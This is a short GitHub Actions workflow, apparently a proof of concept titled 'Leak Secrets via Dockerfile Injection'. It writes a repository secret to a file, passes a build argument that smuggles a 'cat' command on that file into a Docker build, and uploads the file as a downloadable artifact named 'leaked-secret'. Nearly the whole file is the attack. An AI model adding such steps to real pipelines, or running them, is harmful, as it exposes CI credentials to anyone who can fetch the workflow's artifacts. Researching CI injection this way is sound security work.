name: Leak Secrets via Dockerfile Injection

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Build Docker image with injected command
        run: |
          echo "$MY_SECRET" > secret.txt
          docker build . \
            --build-arg INJECT_ME="cat /github/workspace/secret.txt" \
            -t leak-poc

      - name: Upload result
        uses: actions/upload-artifact@v4
        with:
          name: leaked-secret
          path: secret.txt
